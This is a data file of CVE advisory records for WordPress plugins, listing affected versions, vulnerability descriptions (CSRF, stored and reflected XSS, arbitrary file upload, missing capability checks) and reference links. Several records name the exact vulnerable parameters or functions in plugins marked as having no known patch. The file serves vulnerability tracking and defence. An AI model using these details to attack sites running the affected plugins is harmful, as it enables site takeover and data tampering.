{"CVE_ID":"CVE-2024-0828","slug":"play-ht","versionImpact":"3.6.4","description":"The Play.ht \u2013 Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with subscriber access or higher, to delete, retrieve, or modify post metadata, retrieve posts contents of protected posts, modify conversion data and delete article audio.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4969","slug":"wp-widget-bundle","versionImpact":"2.0.0","description":"The Widget Bundle WordPress plugin through 2.0.0 does not have CSRF checks when logging Widgets, which could allow attackers to make logged in admin enable\/disable widgets via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a7ec5dc-eda4-4fed-9df9-f41d2b937fed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a7ec5dc-eda4-4fed-9df9-f41d2b937fed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9172","slug":"demo-importer-plus","versionImpact":"2.0.1","description":"The Demo Importer Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476c4eb3-db28-4f6a-9502-969e7f1c5ec1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476c4eb3-db28-4f6a-9502-969e7f1c5ec1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-importer-plus\\\/trunk\\\/inc\\\/importers\\\/wxr-importer\\\/class-demo-importer-plus-wxr-importer.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-importer-plus\\\/trunk\\\/inc\\\/importers\\\/wxr-importer\\\/class-demo-importer-plus-wxr-importer.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-importer-plus\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-importer-plus\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160715\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160715\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49627","slug":"wp-image-seo","versionImpact":"1.1.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Noor Alam WordPress Image SEO allows Cross Site Request Forgery.This issue affects WordPress Image SEO: from n\/a through 1.1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-image-seo\\\/wordpress-wordpress-image-seo-plugin-1-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-image-seo\\\/wordpress-wordpress-image-seo-plugin-1-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10521","slug":"contact-forms","versionImpact":"1.9.2","description":"The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.2. This is due to missing or incorrect nonce validation on the process_bulk_action function. This makes it possible for unauthenticated attackers to delete forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-list-page.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-list-page.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-submissions-page.php#L348\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-submissions-page.php#L348\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196728\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196728\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-forms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f86e8ccb-a865-4da5-9250-dd715b8cdbe7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f86e8ccb-a865-4da5-9250-dd715b8cdbe7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12709","slug":"bulk-me-now","versionImpact":"2.0","description":"The Bulk Me Now! WordPress plugin through 2.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2482","slug":"gotcha-gesture-based-captcha","versionImpact":"1.0.0","description":"The Gotcha | Gesture-based Captcha plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'menu' parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gotcha-gesture-based-captcha\\\/trunk\\\/admin\\\/libs\\\/setting.php#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gotcha-gesture-based-captcha\\\/trunk\\\/admin\\\/libs\\\/setting.php#L223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gotcha-gesture-based-captcha\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gotcha-gesture-based-captcha\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e7f1fe6-0a23-48e1-a75f-f8c1c8d4f8e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e7f1fe6-0a23-48e1-a75f-f8c1c8d4f8e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9544","slug":"mapsvg","versionImpact":"8.6.4","description":"The MapSVG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 8.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/simplepx.com\\\/newfloward\\\/wp-content\\\/uploads\\\/mapsvg\\\/malicious.svg\",\"name\":\"https:\\\/\\\/simplepx.com\\\/newfloward\\\/wp-content\\\/uploads\\\/mapsvg\\\/malicious.svg\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec77f96-c73a-44f7-afa2-673f68ee3582?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec77f96-c73a-44f7-afa2-673f68ee3582?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5831","slug":"droip","versionImpact":"2.2.0","description":"The Droip plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the make_google_font_offline() function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/droip.com\\\/\",\"name\":\"https:\\\/\\\/droip.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd129829-9682-4def-a07f-66f9178eeb77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd129829-9682-4def-a07f-66f9178eeb77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2933","slug":"0mk-shortener","versionImpact":"0.2","description":"The 0mk Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the zeromk_options_page function. This makes it possible for unauthenticated attackers to inject malicious web scripts via the 'zeromk_user' and 'zeromk_apikluc' parameters through a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/0mk-shortener\\\/trunk\\\/0mk.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/0mk-shortener\\\/trunk\\\/0mk.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b798c64-3434-427d-b578-5abbdac8cd0e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b798c64-3434-427d-b578-5abbdac8cd0e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-38356","slug":"pearl-header-builder","versionImpact":"1.3.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in StylemixThemes WordPress Header Builder Plugin \u2013 Pearl plugin <=\u00a01.3.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pearl-header-builder\\\/wordpress-pearl-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pearl-header-builder\\\/wordpress-pearl-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0708","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_first_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7549db-9a4b-4dee-8023-d7863dc3b4c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7549db-9a4b-4dee-8023-d7863dc3b4c8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5531","slug":"wp-responsive-slider-with-lightbox","versionImpact":"1.0","description":"The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the delete functionality. This makes it possible for unauthenticated attackers to delete image lightboxes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/055b7ed5-268a-485e-ac7d-8082dc9fb2ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/055b7ed5-268a-485e-ac7d-8082dc9fb2ad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1472","slug":"wp-maintenance","versionImpact":"6.1.6","description":"The WP Maintenance plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.1.6 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's maintenance mode obtain post and page content via REST API.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0827","slug":"play-ht","versionImpact":"3.6.4","description":"The Play.ht \u2013 Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5006","slug":"boostify-header-footer-builder","versionImpact":"1.3.2","description":"The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018size\u2019 parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c2a5d4-f201-4cc8-ac49-cde1160ca468?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c2a5d4-f201-4cc8-ac49-cde1160ca468?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu-vertical.php#L393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu-vertical.php#L393\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097085\\\/#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097085\\\/#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boostify-header-footer-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boostify-header-footer-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4755","slug":"google-cse","versionImpact":"1.0.7","description":"The Google CSE WordPress plugin through 1.0.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7649","slug":"opal-membership","versionImpact":"1.2.4","description":"The Opal Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via checkout form fields in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed2bb3e2-5002-4746-a4f8-b5d1752ccbbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed2bb3e2-5002-4746-a4f8-b5d1752ccbbf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-checkout.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-checkout.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8967","slug":"iworks-pwa","versionImpact":"1.6.3","description":"The PWA \u2014 easy way to Progressive Web App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/000bf956-1781-4596-ac12-81691fdd789c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/000bf956-1781-4596-ac12-81691fdd789c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/iworks-pwa\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/iworks-pwa\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iworks-pwa\\\/trunk\\\/includes\\\/iworks\\\/class-iworks-svg.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iworks-pwa\\\/trunk\\\/includes\\\/iworks\\\/class-iworks-svg.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161056\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161056\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10895","slug":"wp-counter-up","versionImpact":"2.4.0","description":"The Counter Up \u2013 Animated Number Counter & Milestone Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lgx-counter' shortcode in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-counter-up\\\/trunk\\\/public\\\/class-wp-counter-up-public.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-counter-up\\\/trunk\\\/public\\\/class-wp-counter-up-public.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e070de-bd77-48a4-a9c2-3938b144398a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e070de-bd77-48a4-a9c2-3938b144398a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12708","slug":"bulk-me-now","versionImpact":"2.0","description":"The Bulk Me Now! WordPress plugin through 2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0370","slug":"shortcodes-ultimate","versionImpact":"7.3.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018src\u2019 parameter in all versions up to, and including, 7.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229060\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229060\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcodes-ultimate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcodes-ultimate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0869c35-9ea8-46a5-8bba-23d7ef47355a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0869c35-9ea8-46a5-8bba-23d7ef47355a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2479","slug":"easy-custom-admin-bar","versionImpact":"1.0","description":"The Easy Custom Admin Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018msg\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-custom-admin-bar\\\/trunk\\\/adminbar.php#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-custom-admin-bar\\\/trunk\\\/adminbar.php#L198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-custom-admin-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-custom-admin-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140f633c-c2e4-4b3c-befc-d870e06be970?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140f633c-c2e4-4b3c-befc-d870e06be970?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
